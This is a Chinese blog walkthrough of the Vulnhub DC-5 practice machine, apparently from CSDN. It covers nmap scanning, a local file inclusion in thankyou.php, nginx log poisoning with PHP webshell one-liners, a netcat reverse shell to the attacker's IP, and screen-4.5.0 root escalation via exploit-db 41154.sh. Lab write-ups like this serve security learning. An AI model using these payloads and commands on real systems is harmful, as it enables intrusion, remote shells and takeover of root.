Vulnhub | DC5靶机 渗透测试

已于 2023-03-07 15:27:40 修改
阅读量258 收藏 1
点赞数 1
分类专栏: 靶机 文章标签: 网络安全 系统安全 linux
于 2023-02-28 23:49:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43891732/article/details/129272266
版权

DC系列靶机 5/9
主要内容:burp爆破登录框、本地文件包含漏洞(LFI)、nginx错误日志写一句话木马、screen-4.5.0提权

官网下载地址:https://www.vulnhub.com/entry/dc-5,314/
作者主页下载地址:https://www.five86.com/dc-5.html
靶场描述:
description

DC-5

信息搜集

主机发现

arp-scan -l
nmap -sP 192.168.1.0/24
netdiscover -r 192.168.1.0/24
-r range
192.168.1.178

端口扫描

nmap -p- -A 192.168.1.178
nmap -sS -p- -A 192.168.1.178
nmap -sT -p- --min-rate 2000 192.168.1.178

--min-rate	最小发包率

nmap
扫出端口:8011158083,后面两个端口是RPC服务,不知道咋用

中间件是nginx/1.6.2

目录扫描

查看页面
index
爆破目录

dirb http://192.168.1.178 /usr/share/wordlists/dirb/big.txt -X .php,,.txt
-X	着重找这几个后缀
我给了两个后缀和一个无后缀

/
/about-us.php
/contact.php
/css/
/faq.php
/footer.php		这个在页面没看到,记录
/images/
/index.php
/solutions.php
/thankyou.php

dirb 扫描
发现输入框
输入框
抓包重放,发现下面这个会变动

burp
/thankyou.php中对应下面这个
在这里插入图片描述
单独访问/footer.php,刷新就会变动

footer.php
应该是thankyou.php调用了footer.php,判断可能有本地文件包含漏洞(LFI)

本地文件包含漏洞利用(LFI)

抓包改参数重放

file=/etc/passwd

burp 重放
成功执行,确定有文件包含漏洞

学到了wfuzz的用法

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hl 42 http://192.168.1.178/thankyou.php?FUZZ=/etc/passwd
-c	输出有颜色
-w	wordlist
--hl	隐藏Lines列值为42的行(顺序在字典后面,不然会报错
FUZZ	fuzz的位置,第二个位置用FUZ2Z,类推第n个用FUZnZ

wfuzz
接下来用burpsuite抓包,利用文件包含漏洞

前面扫出是nginx服务,在网站上的操作会被记录到日志文件中

配置文件:/etc/nginx/nginx.conf
错误日志:/var/log/nginx/error.log
访问日志:/var/log/nginx/access.log

查看nginx配置
查看nginx配置
查看错误日志
机器容易出问题,没什么规律,access.log访问不了,就利用error.log,再不行就重置机器

反弹shell可用两种方式,一种是写入<?php system($_GET['abcd']);?>,通过访问构造的url执行命令进行反弹shellhttp://192.168.1.101/thankyou.php?file=/var/log/nginx/access.log&abcd=nc -e /bin/bash 192.168.1.101 2333

另一种是写入<?php @eval($_POST['abcd']);?>,用蚁剑连反弹shell

写入一句话木马

蚁剑连

反弹shell

kali
nc -lvnp 2333
蚁剑shell
nc -e /bin/bash 192.168.1.101 2333

反弹shell
创建交互

python -c 'import pty;pty.spawn("/bin/bash")'

提权

看看sudo有没有无需密码的命令sudo -l

sudo -l

再看看有无SUID提权命令

find / -perm -4000 -print 2>/dev/null

SUID
screen-4.5.0可疑,在exploit-db中找找

kali直接命令行查找
searchsploit screen 4.5.0

searchsploit
看标题应该是同一个漏洞,将41154.sh复制到当前路径

searchsploit -m 41154.sh

searchsploit -m

打开看看
41154.sh
可以看到,前两段运行后,编译好的文件会放在/tmp下;第三段是执行程序,应该在目标机器上运行。为避免目标机器环境不支持编译,我们先将前两段剪切出来放本地编译,再将编译好的文件和第三段单独打包的文件放进目标机器中运行。

上传文件

chmod +x dc5.sh再执行./dc5.sh,一般就提到root权限了,我这glibc版本问题,运行报错

/tmp/rootshell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by /tmp/rootshell)

ldd --version		查看glibc版本号

更换glibc有点麻烦,我换wsl2ubuntu 20.04 glibc 2.31进行编译,再传,成功提到root权限

切换glibc可以参考:更换glibc版本pwn题切换不同glibc版本实测
提权成功

get flag

thisistheflag.txt

以上

空山松子_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 2114
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
带妹玩转Vulnhub【四】
BadRer的博客
10-01 808
前言 今天我们请到了炫酷的女装大佬,和我一起为大家进行讲解,这次就不带妹子玩了,毕竟有女装大佬,真香!
vulnhub-CH4INRULZ渗透测试
遇事不决冲冲冲
11-17 3388
环境搭建 vulnhub官网https://download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova 下载好后直接拖进来,失败就再拖一次,成功部署后就是一个登陆界面 思路 nmap开路拿到四个端口,80和8011开放了Web服务,之后在扫80端口的目录时发现/development状态码是401需要密码认证,接着扫文件发现index.html.bak利用john爆破拿到账号密码,之后就是一个文件上传的功能,还是扫8011端口的目录发现文件包含漏洞。两者结合。其
version `GLIBC_2.34‘ not found简单有效解决方法
热门推荐
huazhang_001的博客
02-01 9万+
Error /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34’ not found添加一个高级版本系统的源,直接升级libc6.Ubuntu 20.04 - added this repo as described in the link
/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34‘ not found
weixin_42497363的博客
07-06 1万+
/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-5 靶场记录
m0_52729465的博客
07-29 65
6、searchsploit screen-4.5.0后下载相关文档,根据文档的指示写了三个文件libhax.so、rootshell、dc5.sh,通过蚁剑直接上传到靶机中,赋予dc5.sh 777权限并执行,即可成功。5、kali中使用sudo -l发现无法查看,则通过find / -perm -u=s -type f 2>/dev/null来查看是否可以使用suid提权,发现可以利用screen-4.5.0进行提权。3、由于页面是nginx,nginx的默认日志路径为/var/log/nginx中,
DC-5靶机详细渗透过程
MRS_jianai的博客
12-21 504
DC-5靶机详细渗透过程
Linux】Ubuntu:/lib/x86_64-linux-gnu/libm.so.6: versionGLIBC_2.34“ not found
yuan1244487110的博客
12-05 1489
T3、跟失败检查对比,很显眼升级成功到更高版本。T1、仅仅展示要打开的文件大概内容和目录。T2、主要为:安装更高版本libc。
Vulnhub靶机渗透测试】之DC-5(screen-4.5.0漏洞脚本提权)
Pluto.的博客
12-29 1577
文章目录Vulnhub靶机渗透测试之DC-51. 信息收集2. 漏洞利用3. 提权 Vulnhub靶机渗透测试之DC-5 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-5,314/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.142。 1. 信息收集 2. 漏洞利用 3. 提权 ...
问题:libc.so.6: versionGLIBC_2.34‘ not found 高效解决办法
最新发布
qq_40737241的博客
12-14 1万+
电脑系统ubuntu20.04,在工作时遇到 libc.so.6: version 'GLIBC_2.34' not found ,经过检索和实践添加一个高级版本系统的源,直接升级libc6的方法最简便。
修改高版本glibc编译出的elf以支持低版本glibc环境客户机执行
w16212的专栏
08-29 2298
修改高版本glibc编译出的elf以支持低版本glibc环境客户机执行
/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.17' not found 解决办法
rayylee
05-26 6万+
今天编译一个工程,在目标机上运行app,出现了这个错误。 下面我们由这条报错信息入手,寻找问题的答案: 1.首先保证程序没有被strip,也就是说可执行程序含有符号表信息。 2.出现这个问题的原因是glibc的版本太低,查看系统glibc支持的版本 root@ubuntu:/dvr# strings  /lib/x86_64-linux-gnu/libc.so.6 | gr
ubuntu18.04上 /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28‘ not found
cumtchw
09-01 4万+
在ubuntu上面安装了某软件之后,打开该软件之后提示ubuntu18.04上 /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28' not found 然后发现自己电脑里面本来是GLIBC_2.27版本, 于是要安装 libc-2.28.so curl -O http://ftp.gnu.org/gnu/glibc/glibc-2.28.tar.gz tar zxf glibc-2.28.tar.gz cd glibc-2.28/ mkdir
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。 一、Vulnhub简介 Vulnhub是一个开源的渗透测试平台,提供了多种类型的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值